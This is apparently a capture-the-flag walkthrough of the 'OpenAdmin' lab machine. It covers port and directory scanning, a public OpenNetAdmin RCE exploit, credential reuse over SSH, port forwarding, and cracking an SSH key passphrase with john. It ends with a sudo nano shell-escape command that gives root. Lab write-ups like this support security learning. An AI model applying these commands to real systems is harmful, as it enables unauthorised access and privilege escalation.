Let’s begin with an Nmap scan to enumerate listening ports and their services. We see that there are two ports open.
- 22: OpenSSH 7.6p1
- 80: Apache httpd 2.4.29
Enumeration – HTTP
When browsing to the index.html page, we are presented with the default Apache landing page. Therefore we must perform a Gobuster scan to see if there are other pages or directories. Firstly we see
/music which contained some music samples. Interestingly, when we click on Login, we are redirected to the
/ona page. We see that
/ona is running OpenAdmin version
18.1.1, and the DNS domain is
openadmin.htb. We are able to find a remote code execution exploit for the OpenNetAdmin software on the Exploit-DB (47691).
Getting the initial shell
We do not have a full shell yet, it seems that the exploit is a glorified web shell. I noticed this because if we attempt to change directory, we are always brought back to the initial working directory. However, using the web shell we can enumerate files and we see some possible credentials which could be used to start an SSH session in the
db_passwd -> n1nj4W4rri0R! This password allowed us to login to SSH as the
Pivot to second user
We must pivot to the second user (Joanna) to get the user.txt flag. I like to check what other services the host is listening for on localhost only. Using the
netstat -antup we see an interesting port
52846, however do not have the rights to see what process is bound to that port.
I wondered if this could perhaps be a second web server, so I navigated to
/etc/apache2/sites-enabled, and we see that there is both
internal.conf. Bingo. The
internal.conf file revealed that there indeed is another web server listening on localhost only, with the files stored at
After doing a code review, it seems that if we login to the application, then we will be given Joanna’s private id_rsa key, which could allow us to pivot to her user.
I started a port forwarding SSH session so that I have access to the web server from my localhost
$ ssh -L 52846:localhost:52846 email@example.com
After navigating to the page, it seems that there is a login required. However, after performing a code review, it appears that the application stored the password hash within the login form. There are two routes here. Jimmy user does have permission to edit the file so that we could remove the password altogether, or we could crack the hash. I opted to try and Google the hash first, perhaps someone had already cracked it before. Besides, perhaps it was an unintended misconfiguration that Jimmy was allowed to edit the files. . And we are in luck, we found that the plaintext password was
Bingo, we get the id_rsa key as expected.
Of course the key is encrypted, so we use
john to try and crack the password using rockyou.txt.
$ ssh2john.py id_rsa > crack_me.rsa $ john --wordlist=/usr/share/wordlists/rockyou.txt crack_me.rsa bloodninjas
Bingo, the passphrase for the encrypted id_rsa is
Escalate to root user
We need to perform some user enumeration, starting off with
sudo -l. We see that Joanna is allowed to edit
/opt/priv as root user without a password using
nano. Thankfully, GTFOBins has us covered, and we are able to escape nano to get a shell using the
My friend has done a demo on YouTube
$ sudo -l User joanna may run the following commands on openadmin: (ALL) NOPASSWD: /bin/nano /opt/priv $ sudo /bin/nano /opt/priv ^R^X reset; sh 1>&0 2>&0